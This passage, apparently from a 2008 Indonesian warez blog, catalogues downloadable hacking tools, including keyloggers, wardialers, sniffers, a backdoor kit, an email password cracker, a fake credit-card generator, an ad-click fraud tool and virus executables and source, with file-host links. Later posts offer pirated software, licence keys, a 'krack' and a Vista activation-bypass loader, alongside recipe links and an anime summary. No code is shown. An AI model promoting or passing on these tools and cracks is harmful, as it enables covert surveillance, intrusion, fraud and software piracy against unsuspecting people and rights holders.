6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard key effectively!.
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on PC and saves all information in the LOG files.
11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.
12. Phantom2: Record and playback a keystroke program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.
MISC
1. Game Hack: Having Game Wizard 32 and CrackAid, two tools.
2. HeadStrong WebClicker: Use public proxies to create artificial banner ad clicks.
3. Linux_misc: Collect many Linux misc tools with some source files as TCFS, SILC, DDNSF, St Jude, FreeVSD.
4. Misc: Include many misc of source codes and tools that can do such job as hijacking, monitoring, or interception, etc.
5. Quick Socket: Allow you administrator to chat (via keyboard) directly to a remote user also running Quick Socket.
6. Shutdown 2000: Disturb running application program.
7. Windows_misc: Contain all kinds of Windows misc tools, especially Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, etc.
Packet forging
1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.
2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.
4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.
6. Snot: Use snort rules files as its source of packet information.
7. Winject: Inject packet for Windows 9x, also called drugs for Windows.
Phreak tool
1. Auto Dial: Help you to use a war dialer easily.
2. Blue Dial: Make it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deal out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.
6. CPhreak: It is the first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Search for dial tones and carriers in the same call.
9. No Carrier: Scan with Dos shell, graphics and more!.
10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.
12. PhoneTag: Check for starttime every second while it’s running.
13. Phreak box: Construct and use phreak box.
14. Super Dial: Call all of your town (or cities) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: It is another wardialer.
17. Tone Loc Utilities: It is also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone with it.
Scanner
1. 7th Dimension Port Scanner: Scan your port address more easily.
2. AB Complete Ping: Allow you to ping one or more IP addresses, to scan a network for shared resources and to scan a computer for open ports.
3. Angry IP Scanner: Scan IP very easily and rapidly!.
4. Dave’s Port Sniffer: Detect FTP, HTTP, POP, SMTP, TELNET and FINGER deamons running on any TCP host machine.
5. DeadBolt: Monitor holes in Windows and alert you when it detects suspicious activity, giving you the power to stop viruses dead in their tracks!.
6. Linux-Vuln-source: Carry the two scanner as Rnmap and VLAD ’s system security kit!.
7. MacAnalysis: Audit suite for your Macintosh to perform and help implement a security standard for your computer/network by performing some work.
8. NetBIOS Security Kit(unix): Perform various security checks on remote servers running NetBIOS file sharing services.
9. NetBIOS Security Kit(windows): Perform various security checks on remote servers running NetBIOS file sharing services.
10. Netmon: Monitor network connections.
11. Nmap: Explore or security audit network on Linux or Unix.
12. Port Invader: Scan a range or list of IP addresses to verify if there are open or closed ports.
13. Port Scanner: Scan a group of IP address looking for the presence of specific incoming TCP/IP ports.
14. PortScan: Scan port fast and configurably!.
15. Port_Scanner: Collet 20 tools to use in port sacanner on Linux or Unix!.
16. Portscan SMS Alert: Alert you when probed scandlogd logs information to syslog and invokes this shell script.
17. Scanner: Collect 84 tools and misc to scan.
18. SecureScan NX: Scan your distributed network architecture for vulnerabilities from one central location.
19. SkPortScan ActiveX Control: Integrate port-scanning capabilities into your applications with this ActiveX control.
20. THC-HappyBrowser: Check an NT-Server/Webserver for known vulnerabilities.
21. THC-Probe: Scan compilation for Linux.
22. THC-Scan: Automate tone, carrier, vmb scanning.
23. WhereIsIP: Find the geographic location of chat room members, ICQ members, and more.
24. Windows_Trojan_Scanner: Collect 6 little tools scanning whole networks to find well known Trojans.
25. Windows_port_scanner: Collect 9 Port Scanner running on Windows.
26. XSharez scanner: Scan, search and get specific resources for you.
Sniffer
1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.
3. Ethereal0814: Free network protocol analyzer’s another version.
4. Ethereal0817: Analyze network protocol, another version of Ethereal.
5. Ethereal0820: Analyze network protocol freely for Win32.
6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.
7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.
8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.
10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.
11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.
12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.
13. Snarp: Allow the host to sniff the data from the wire.
14. Sniff-em: Base on a competively priced, performance minded Windows as a Network analyzer.
15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.
19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.
Snoop tool
1. ID: Display the ID information of machine’s specific hardware.
2. IPQuery: Show the current IP Address.
3. NetroSnooper: Find hidden files on the internet!.
4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.
6. ShellSPY: Track every process running on your PC.
7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.
8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.
Source code
1. APG: Set for random password generation.
2. ARP Monitor: Trace arp requests from/to your machine.
3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.
4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer, this includes its source code.
6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.
7. Emailcrk: Crack password of e-mail account.
8. Findhost: Scan port on the net for you.
9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Use IGMP packet tool’s source code.
11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.
12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimick as much functionality in GNU grep as possible, applied at the network layer.
15. Nutcracker: Check/crack password tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.
17. Portscanner: Scan a group of IP address.
18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.
19. ShareDecryption: Extract share passwords from registry.
20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.
21. Wnuke4: This is the complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool’s source code!.
Spoof
1. Credit probe: Creates fake credit card numbers.
2. HTTPort: Establish a transparent TCP/IP tunnel through a proxy server.
3. IP Spoofer: Support IP spoofing software kit.
4. Ircgspoofer: Spoofer software on IRC Ghost.
5. Pinger: Trick your ISP into thinking you are always active.
Virus
1. Virus_exe: Including six most typical executable virus programs.
2. Virus_source: Containing many virus source codes in the package, this page will be devoted to Virii and Trojan’s, 89 files in all.
Download :
http://www.megaupload.com/?d=Z3RK5G91
http://www.megaupload.com/?d=X3AQJ4P2
http://www.megaupload.com/?d=3NEGK6RJ
http://www.megaupload.com/?d=V2JMPQUY
http://www.megaupload.com/?d=FA2XYT4A
http://www.megaupload.com/?d=YZ9W0LA0
http://www.megaupload.com/?d=YJP8RZHT
ganti formatnya dengan format .iso
Many Recipes!!
Soup Recipes
http://www.ziddu.com/download.php?uid=aLOfmpSpZKubnZqnsayZlJyiY6%2BWlZqn3
Salad Recipes
http://www.ziddu.com/download.php?uid=aaqbnZqnZ7OiluKnZaqhkZSqYqufl5qu5
Italian Recipes
http://www.ziddu.com/download.php?uid=ZqydmpStZLKhluKnY6qhkZSqYKuflp2m3
Maxican Recipes
http://www.ziddu.com/download.php?uid=aaycmZymbrKZmJittKyZlJyiZq%2BWlZqp6
Pizza Recipes
http://www.ziddu.com/download.php?uid=ZKuZnJWpZ7CZlJbzZaqZnJGlaKeamp2uZA%3D%3D3
Healthy Recipes
http://www.ziddu.com/download.php?uid=abCZl52tbKqfluKnY6qhkZSqYKufmZ2o3
Fish & Game Recipes
http://www.ziddu.com/download.php?uid=b7Kdlpqna7ChluKnZ6qhkZSqZKufm52q7
Copycat Recipes
http://www.ziddu.com/download.php?uid=Z6uempanY6qelOKnYaqhkZSqXqufmZmm1
Chinese Recipes
http://www.ziddu.com/download.php?uid=cq6ZlpWtba%2BaluKnaaqhkZSqZqufnJiu9
Appetizer Recipes
http://www.ziddu.com/download.php?uid=ZaqamJumY6qdnOKnY6qhkZSqYKuflZym3
http://www.ziddu.com/download.php?uid=aLOfmpSpZKubnZqnsayZlJyiY6%2BWlZqn3
Salad Recipes
http://www.ziddu.com/download.php?uid=aaqbnZqnZ7OiluKnZaqhkZSqYqufl5qu5
Italian Recipes
http://www.ziddu.com/download.php?uid=ZqydmpStZLKhluKnY6qhkZSqYKuflp2m3
Maxican Recipes
http://www.ziddu.com/download.php?uid=aaycmZymbrKZmJittKyZlJyiZq%2BWlZqp6
Pizza Recipes
http://www.ziddu.com/download.php?uid=ZKuZnJWpZ7CZlJbzZaqZnJGlaKeamp2uZA%3D%3D3
Healthy Recipes
http://www.ziddu.com/download.php?uid=abCZl52tbKqfluKnY6qhkZSqYKufmZ2o3
Fish & Game Recipes
http://www.ziddu.com/download.php?uid=b7Kdlpqna7ChluKnZ6qhkZSqZKufm52q7
Copycat Recipes
http://www.ziddu.com/download.php?uid=Z6uempanY6qelOKnYaqhkZSqXqufmZmm1
Chinese Recipes
http://www.ziddu.com/download.php?uid=cq6ZlpWtba%2BaluKnaaqhkZSqZqufnJiu9
Appetizer Recipes
http://www.ziddu.com/download.php?uid=ZaqamJumY6qdnOKnY6qhkZSqYKuflZym3
GREAT CHEESECAKES

Part 1 - http://www.ziddu.com/download.php?uid=b6qhnJWub7GfnJSltayZlJyiZ6%2BWlZir7
Part 2 - http://www.ziddu.com/download.php?uid=aKqglpasZa6cluKnY6qhkZSqYKudmJqm3
Part 3 - http://www.ziddu.com/download.php?uid=aquilJqnZqqhnOKnZqqhkZSqY6udl5ys6
Part 4 - http://www.ziddu.com/download.php?uid=aquflZauZa2eluKnYqqhkZSqX6udm5im2
Part 5 - http://www.ziddu.com/download.php?uid=Z66cmJiraaycnOKnZqqhkZSqY6udlZes6
Part 6 - http://www.ziddu.com/download.php?uid=Z6udmZapaa%2Bfm5qnsayZlJyiY6%2BWlZir3
Part 7 - http://www.ziddu.com/download.php?uid=cbKblpyoaKudluKnaKqhkZSqZaudnJ2m8
Friday, May 23, 2008
Naruto : The Movie 4
Death Note 3 : L Change The World

Death Note dibagi menjadi dua bagian, yaitu Death Note(sekuel pertama) dan Death Note The Last Name (sekuel kedua)
sedikit buat loe pada yang enggak tau (whatt??ga tau death note??), sequel sebelomnya adalah tentang pertarungan 2 orang jenius,yaitu detective L (Ryuzaki) dan si jahat Kira (Light Yagami)
Cerita Death Note berawal ketika Light Yagami (Raito Yagami) menemukan sebuah buku yang ternyata milik Shinigami (dewa kematian Jepang) bernama Ryukk (Ryuku). Di dalam Death Note milik Ryuku, terdapat cara menggunakan Death Note yang ditulis olehnya sendiri. Death Note ini kemudian digunakan untuk mewujudkan idealismenya yaitu untuk menciptakan dunia baru yang bersih dari kejahatan, dengan dirinya sebagai Dewa.
Kemudian Death Note ini dia gunakan untuk membunuh para kriminal. Mendapatkan data para kriminal dari televisi maupun mencuri data kepolisian pusat (ayahnya, Shouichiro Yagami adalah seorang polisi). Ternyata tindakannya ini mengundang berbagai reaksi, baik dari masyarakat, para petinggi Jepang, bahkan dari para petinggi internasional. Kebanyakan masyarakat setuju dengan tindakan pembersihan dunia itu, namun para petinggi tidak menyetujuinya karena tindakan tersebut bertentangan dengan Hak Asasi Manusia.
Tidak hanya itu hambatan yang ditemui Raito (yang dijuluki Kira, sebutan untuk Killer dalam dialek Jepang) untuk mewujudkan dunia yang bersih, dia juga harus berhadapan dengan L yang selanjutnya dikenal dengan nama Ryuzaki (nama aslinya sampai akhir cerita tidak diketahui). L adalah seorang detektif profesional muda bertaraf internasional yang hanya bergerak di belakang layar. Setelah bertemu L, jalan cerita "Death Note" menjadi semakin menarik.
dan pada tangga 9 februari 2008 ini,sekuel Death Note 3 "L change the world" telah premiere ^o^
nampaknya di film ketiga ini,dikhususkan buat fans2 L,karena jalan ceritanya engga gitu banyak nyebutin soal Death Note yang terdahulu..
di film ini 70% adalah cerita tentang bagaimana L memecahkan masalah kriminal2.nama asli L bakal disebut disini lho,kalo ngaku fans loe pada pasti maw tau donk ahahhak...
Death Note Anime Collection

Shinigami own notebooks called “Death Notes” which are used as their own personal killing devices. Whoever’s name they write down in a death note will die within 40 seconds. Shinigami Ryuku accidentally drops his Death Note in the human world where it’s found by an honor high school student Raito. With the death note actually having directions in it for its use, Raito discovers he now has the power to discreetly kill people, and with this new power he plans to change the world to fit his ideal, by killing off criminals. Eventually the governments of the countries around the world notice the unusual amounts of deaths of their criminals, and figure out someone is behind them, but they have no way of discovering it themselves. That’s when they hire L, a master detective, to find out who is behind the murders, and the killer who calls himself KIRA.
01 - Rebirth
02 - Confrontation
03 - Transaction
04 - Pursuit
05 - Bargaining
06 - Open Seam
07 - Clouded Sky
08 - Gaze
09 - Contact
10 - Suspicion
11 - Break In
12 - Love
13 - Confession
14 - Friend
15 - Gamble
16 - Decision
17 - Execution
18 - Comrade
19 - Matsuda
20 - MakeShift
21 - Activity
22 - Guidance
23 - Mania
24 - Revival
25 - Silence
26 - Reincarnation
27 - Abduction
28 - Impatience
29 - Father
30 - Justice
31 - Transfer
32 - Selection
33 - Ridicule
34 - Vigilance
35 - Murderous Intent
36 - 1.28
37 - New World
End
Kaspersky Internet Security v7.0.1.325

Kaspersky® Internet Security 7.0 provides you with the same proven anti-virus protection as Kaspersky Anti-Virus together with additional features including Parental Control, a personal firewall, an anti-spam filter, Privacy Control and more.
Product Highlights:
* Integrated protection from all Internet threats
* Integrated antivirus protection: 1) Hourly automated database updates, 2) Preliminary behavior analysis, 3) On-going behavior analysis. New!
* Real-time scanning for email, Internet traffic and files
* Personal firewall with an IDS / IPS system. Improved!
* Protection from leaks of confidential data. New!
* Parental Control. New!
* Protection from spam and phishing
* Automatic database updates
Additional Features:
* Protection from viruses, Trojans and worms
* Protection from spyware and adware
* Protection from all types of keyloggers. Improved!
* Detection of all types of rootkits. Improved!
* Protection from viruses when using ICQ and other IM clients
* Rollback of malicious changes on your PC
* Self-defense of the antivirus program from being disabled or stopped
* Tools for creating a Rescue Disk
* Free technical support
Instructions For KIS:
* Download Kaspersky Anti-Virus 7 from one of the Mirrors Below
* Install it & then Restart the computer.
* A pop up will appear after the restart asking you to Activate.
* Click Apply Existing Key & a new window will open.
* Now, Navigate to where you extracted the keys on your computer then Click on one & Hit OK & then Next when back on the Kaspersky Install Screen.
* The key should now be applied & Kaspersky will be activated. Enjoy & Remember to update as soon as its installed!
Kaspersky Internet Security v7.0.1.325: [Official Kaspersky Mirrors]
http://dnl-eu8.kaspersky-labs.com/trial/registered/3NKDGRXIM7FJ5ZTSIAFW/kis7.0.1.325en.exe
http://dnl-eu9.kaspersky-labs.com/trial/registered/3NKDGRXIM7FJ5ZTSIAFW/kis7.0.1.325en.exe
ftp://dnl-eu10.kaspersky-labs.com/trial/registered/3NKDGRXIM7FJ5ZTSIAFW/kis7.0.1.325en.exe
Kaspersky Internet Security Keys:
http://rapidshare.com/files/106513772/KIS_Keys__10-05-08_.rar
http://rapidshare.com/files/109605985/KIS_Keys__22-04-08__Forumw.org.rar
http://rapidshare.com/files/115674511/KIS_Keys__18-05-08__Forumw.org.rar
http://rapidshare.com/files/116658967/KIS_Keys__22-05-08__Forumw.org.rar
PW: Forumw.org
Atomic Alarm Clock v5.61


Alert yourself about important events with different alarms and
replace your Windows tray clock using different skins.
Computer Alarm clock that will play a MP3 file. It also can run
program, log off, reboot, shut down, power off etc...
Atomic Alarm Clock also an atomic-time synchronizer and advanced
replacement for Windows tray clock. See the time, seconds, day,
date and system UpTime in different skins. Displays the time for
any of the time zones. Over 100 skins are included in the
distribution. Supports the Longhorn clock style.
This computer alarm clock is built into your personal PC and is
completely customizable.
OS: Win2000/XP/2003/Vista
Homepage
Download [Pass : Tested]
Download Accelerator Plus DAP Premium_v8.6.1.4 2008

Download Accelerator Plus (DAP) will accelerate the speed with which you can receive files over the Internet using FTP and HTTP protocols by simultaneously downloading several file segments from the same or different servers.
Download Accelerator Plus enables you to pause and resume downloads, and to recover from a dropped Internet connection.
In addition, DAP searches for mirrors and implements the downloads from the best or most responsive mirrors. It is configured by default to automatically Integrate into your Explorer or Netscape browser when it is installed, and to self-activate each time a download is performed.
Full Speed AND Security! Only with Download Accelerator Plus 8.5 !
Up to 400% faster downloads!
Get the ultimate speed with up to 10 connections për download!
DAP Premium privacy suite ensures your download activity remains discreet!
Direct download with fewer windows for extensive downloaders.
While downloading Zip files see what they contain!
And more . . .
Supported Browsers IE 7.x | 5.x | 6.x Netscape 6.x | 7.x Opera 5 | 6 Mozilla | Firefox
Supported Platforms Windows 98 / ME / XP / NT4 / 2000 / Windows Vista
* New security check by ZoneAlarm for every site & application you download!
* New Tabbed downloading!
* Up to 400% faster downloads.
* Resume broken downloads!
* Preview files while you download.
* NEW and improved interface!
* Daily downloads recommended by DAP users!
Download Here [Pass : alb-warez.net]
SpeedUpMyPC 3.5.2435.209

With SpeedUpMyPC 3, it’s as though you have a full time technician working flat out just for you, helping you to make the best use of all that processing power that you have already bought.
SpeedUpMyPC 3 lets you monitor and control all your PC resources with easy, one click instructions.
System settings, internet usage, disk clutter, RAM and CPU are all automatically scanned, cleaned and optimized for peak performance. You can also selectively disable or remove unnecessary background and auto-start processes to cut valuable seconds off your startup time.
SpeedUpMyPC FEATURES
User Interface:
- Windows Familiar GUI
- Automatic Performance Scan
- System Overview and Recommendations
- Extensive Manual and Help
- System Optimization State
- System Tray Shortcut
- Detailed System Graphs
Optimization:
- CPU Usage Overview
- CPU Booster Functionality
- Memory Usage Overview
- RAM Optimization
- Disk Usage
- Disk Analyzer and Defrag
- Internet Speed Analyzer
- Internet Speed Optimizer
- Startup Manager
- Process Viewer
Clean-Up :
- Junk Clean-Up Scan
- Detailed Junk Clean-Up Scan Results
- Privacy Protector Scan
- Detailed Privacy Protector Scan Results
- File Shredder
- Uninstall Manager
Settings:
- Launch Application at Start-up
- Launch Scan at Start-up
- Start in System Tray
Supported Systems:
- Windows 2000
- Windows XP
Download Here
GuitarPro 5.2 + CD key krack

Guitar Pro is a multitrack tablature editor for guitar, banjo and bass. Besides writing scores, Guitar Pro is a complete tool for young and accomplished guitarists alike to progress, compose, or simply accompany themselves.
Among the new features of Guitar Pro 5:
New RSE [Realistic Sound Engine] with real instrument sounds - listen to some samples
New Graphical Interface (skinable)
4 Display Modes: Page, Parchment, Vertical Screen, Horizontal Screen
Fine Scrolling and Zoom from 30% to 200%
Score display fully redesigned (silimar to published songbooks)
Automatic vertical positionning and spacing of score symbols to avoid collisions and blank spaces
New Page Setup window
Advanced Standard Notation (effects, beams, stem direction...)
Manuscript Configuration for each Track (tablature only, standard notation only or both, diagrams...)
Multiple Selection used for editing and playing tools
Playing of a selected part with Multiple Selection (also works for looped play)
Move Tracks Up and Down
Voice Support (lead and bass)
Coda, Segno (simple and double), Fine + 14 possible jumps
8va, 8vb, 15ma and 15mb
Triplet Feel affected to the bar (8th or 16th)
Improved Alternate Endings
Improved Grace Note and Dead Note
Possibility to add Effects on Tied Notes
Extended Bends and Tremolo Bar
Full Support of Artificial Harmonics
Wah-wah
Heavy Accentuated Notes
Tunings associated to an Instrument
Diagrams displayed with the score and/or under title
Improved Speed Trainer
MusicXML Import/Export
PowerTab Import
TablEdit Import
PDF Export
Improved ASCII Import/Export
BMP Export of a complete page
Improved and Simplified WAVE Export (using Windows® Mixer)
GuitarPro 5.2 + CD key krack
Filesize (11.2 MB)
WindowBlinds 6.10.55 + 101 Themes





WindowBlinds is a one-of-a-kind utility that allows Windows users to completely change the look and feel of the Windows interface by applying a new skin. There are thousands of different skins to choose from that are freely downloadable from the WindowBlinds website.
A WindowBlinds skin can make Windows look like an alternative operating system, like their favorite sports or car brand, or something completely new. Because WindowBlinds uses the latest hardware acceleration features of modern video cards, WindowBlinds won't slow down your computer and uses very little memory.
WindowBlinds is safe and easy to use. It doesn't alter any system files and users can switch between the default Windows look and feel and a custom WindowBlinds skin with the click of a button. In addition, WindowBlinds has been tested to ensure it works with Windows Vista, so you know it is compatible, reliable,, and more secure.
Customize the look & feel of Windows
Tired of your computer having the same old look as every other computer? Want to give your Windows PC its own unique style? Stardock WindowBlinds will let you apply thousands of different skins (visual styles) to change the look and feel of your entire desktop. WindowBlinds is so flexible that users can create skins that mimic the look and feel of other operating systems.
Download :
http://rapidshare.com/files/115291629/L_i_ve_FRoreVer_WB_By_June_2008.rar
101 Themes :
http://rapidshare.com/files/115674327/WBThemes.part1.rar
http://rapidshare.com/files/115675571/WBThemes.part2.rar
http://rapidshare.com/files/115676575/WBThemes.part3.rar
VistaLoader v3.0.0.1 Clean Bios Emulation Loader for Windows Vista SP1

VistaLoader v3.0.0.1 Clean Bios Emulation Loader for Windows Vista SP1 | 2Mb
VistaLoader v3.0.0.1 clean Bios Emulation (Without DOS TEXT boot)
(Based in w00tageman method, all thanks to w00tageman).
To activate Vista SP1 x86-x64 editions, using 15 different Bios emulations (OEM Brands) + 18 official OEM Logos for Windows Vista.
Valid for:
Vista Home Basic
Vista Home Premium
Vista Business
Vista Ultimate
Vista Enterprise (Use the NO LOGO button).
If you use the NO LOGO button, Vista will be activate with ASUS emulation
without OEM LOGOS, also, this button active Vista Enterprise.
Click in one Brand button, wait the confirmation, close activator, reboot and done:
Include uninstaller for old VistaLoader versions:
You can view the Vista activation status if clicking in GENUINE logo
Download :
http://rapidshare.com/files/116747468/SP1_Clean_OEM_Loader_3.0.0.1.rar
Mirror : http://depositfiles.com/files/5524349
Portable Stardock CursorXP

Stardock CursorFX is a program that lets you use and create incredibly cool looking Windows mouse cursors. It does this by taking advantage of the new visual effects features of Windows XP and Windows Vista. CursorFX users can create and use cursors that look and feel far superior to anything you've ever seen before! Best of all, it's really easy to create your own super-charged cursors! It integrates into the standard Mouse interface of Windows and is easy to turn on and off as you need. CursorFX is a replacement for Stardock's immensely popular cursor skinning program called CursorXP.
Customize your cursor!
CursorFX is a utility which allows you to have much more flexibility in the cursors you use to interact with Windows. Let's face it, Windows cursors are at best dull, and can even become annoying if you choose to use those ghastly dinosaur ones! Adding a shadow under Windows XP and Vista was hardly a great advance and therefore CursorFX exists to give you more-much more.
Features:
* Cursors with unlimited size
* Fully anti-aliased cursors
* Fully 32-bit alpha blended cursors
* Animations and scripts
* Cursors with normal and pressed states
* Full featured theme editor
* Full featured graphic control panel
* Fully configurable soft shadow
* New Visual Editor
* New User interface
* New theme format: propriertary, expandable that lets skinners bundle Special effects into themes.
System Requirements:
* Windows XP (32-bit) or Vista (32-bit)
* 100 MB free drive space
* 512 MB RAM
Download :
http://www.filefactory.com/file/eaf176/
Password : thephoenix-forums.com
Portable Paragon Partition Manager Professional 9.0

Portable Paragon Partition Manager Professional 9.0 | Disk partitioning | 27.1 MB
Get complete control over partitioning process with the most powerful feature set! Optimize the use of disk space and improve the performance of your hard disk easily.
Achieve complete hard disk control with the most advanced partitioning tool! It provides a full range of features that meet your specific partitioning needs, whatever they may be: resizing partitions without data loss, running multiple operating systems, copying partitions to a spare hard drive, solving boot problems, converting file systems and other complex operations.
The Bootable Recovery Media ensures data and system access in the event of drive failure.
Partition Manager 9.0 Professional allows you to:
* Redistribute Unused Disk Space - easily resize your partition(s) without any data loss
* Perform advanced partitioning operations: resize/move/copy/merge/undelete partitions
* Change partition properties: hide/unhide, make active/inactive, assign/remove drive letter, change volume label, convert file system, etc.
* Change disk properties: change SID, change primary slots
* Clone hard disks or separate partitions
* Redistribute unused disk space - easily resize your partitions without any data loss
* Volume Explorer (fully embedded within the application) - quickly browse FAT, FAT32, NTFS, Ext2 or Ext3 FS partition, edit or copy files and folders
* Defragment partitions and optimize their cluster size
New and updated features:
* Install New OS Wizard prepares a hard disk for a new operating system installation
* Updated! Safely setup and manage multiple operating systems on the same PC with the Boot Manager
* Updated! Boot Corrector allows you to resolve most common boot problems.
* Simple Backup Wizard allows you to back up system and data to a local or network disk before applying any critical operations.
* The Initial Backup Reminder which appears on program startup, advices to back up system and data before critical partitioning operations.
* Restore entire disks or separate partitions and roll-back your unsuccessful partitioning operations with the Paragon Recovery CD
* File Transfer Wizard can restore separate files and folders from a previously created backup archive.
* Updated! Dynamic disk support (convert to basic, backup/restore, defrag, check file system).
* Updated! Disk Editor enables to view and manually edit hard disk/partition contents in a hexadecimal mode.
* Shrink/compact MFT allows compressing Master File Table for best performance of your system.
* Express Launcher provides user-friendly interface and quick access to most common operations.
* Updated! Improved Windows Vista support, including 64-bit editions.
* Included in the set Paragon Drive Backup 8.51 trial version allows you to evaluate powerful backup and restore tools.
Download :
http://rapidshare.com/files/116716882/PPMP9.0.rar
No Password
Windows Media Player 12 2008

Windows Media Player 12 2008
RAR | 30.5MB | Windows Media Player 12 2008
Windows Media Player 12 Release 2008
Windows Media Player (WMP) is a digital media player and media library application developed by Microsoft that is used for playing audio, video and viewing images on personal computers running the Microsoft Windows operating system, as well as on Pocket PC and Windows Mobile-based devices. Editions of Windows Media Player were also released for Mac OS, Mac OS X and Solaris but development of these has since been discontinued.
Download :
http://depositfiles.com/files/5525140
No Password
Adobe Plugins Pack

Adobe Plugins Pack
Genre: Editing| 357Mb | CD-Rom | Rar
* Adobe Illustrator CS2 v12.0 Bonus
* Adobe Illustrator Plugins Library
* Adobe Photoshop Brushes
* Adobe Photoshop CS Plugins & Filters
* Adobe Photoshop Scripting 1.0 Plugin
* Adobe Premiere Pro Plugins
* 1800 PS Plugins
Download:
http://rapidshare.com/files/116363827/adobe_plugins_packs.part1.rar
http://rapidshare.com/files/116379417/adobe_plugins_packs.part2.rar
http://rapidshare.com/files/116392959/adobe_plugins_packs.part3.rar
http://rapidshare.com/files/116399595/adobe_plugins_packs.part4.rar
http://rapidshare.com/files/116522142/1800_PS_Plugins.rar
No Password
Windows XP Professional Corp Edition SP3 VLK with SATA Drivers

Windows XP Professional Corp Edition SP3 RTM SATA Driver
OS: Win32 | 587 MB
This is an UNTOUCHED Windows XP Professional Corporate Edition SP2 And I had just Integrated SP3 Final RTM From MicroSoft WITHOUT ANY OTHER CHANGE Except The serial {Volume License Key [VLK]}. So you don't need to write it when you BOOT from this CD to setup Windows. This is GENUINE and Accept any Updates. And I had Integrated too ALL the driver of Intel SATA/AHCI and SATA/RAID For Friends who need this
Depositfiles
http://depositfiles.com/files/5522976
http://depositfiles.com/files/5523356
http://depositfiles.com/files/5523655
http://depositfiles.com/files/5523990
http://depositfiles.com/files/5524303
http://depositfiles.com/files/5524810
http://depositfiles.com/files/5524881
No Password
RapidShare Unlimited Download
Rapidshare Unlimited download direct 1.0
Rapidshare Unlimited download direct 1.0
Download Resume
Multiple downloads
Immediate download start(No need to enter codes)
No download limits
Boosts download speed
No waiting whatsoever.
Download Here
Rapidshare Unlimited download direct 1.0
Download Resume
Multiple downloads
Immediate download start(No need to enter codes)
No download limits
Boosts download speed
No waiting whatsoever.
Download Here
Your Uninstaller! Pro 2008 6.1.1229 Full
Your Uninstaller! uninstaller program is the industry’s leading uninstaller program. World’s the 1st smart Drag&Uninstall™ uninstaller program under the Windows platform. Using Your Uninstaller! is as easy as using the recycle bin. Imagine! Just a drag-drop and the program you don’t want will disappear from your computer– as well as everything the unwanted program brings! Your Uninstaller! is a user-friendly way of removing unneeded applications on your computer. It can even remove some annoying spywares!
Key Features Lihat Disini
Download Disini
Key Features Lihat Disini
Download Disini
Thursday, May 22, 2008
Portable Windows XP Live USB Edition 2008

Portable Windows XP Live USB Edition 2008 Did you ever want to boot up into Windows XP via a USB memory key? Well, now you can !!! This is a miniature version of Win XP enough to get you up and running so you can restore from backup, access your files, or do whatever you have to do. Instructions inside!
This is what you need :
-USB stick with 256 MB capacity. 512 MB Recommended.
-A system that supports booting from Usb stick.
Installation :
1. Rename USB stick through file HPUSBFW.exe and format with FAT file system.
2. Copy all the files from a folder on USB stick.
Start :
1. Reboot the computer.
2. In BIOS or through Quick-boot menu choose boot from the USB.
Download :
Part 1
Part 2
Buat Penggemar Game!!

Game Accelerator 7.1
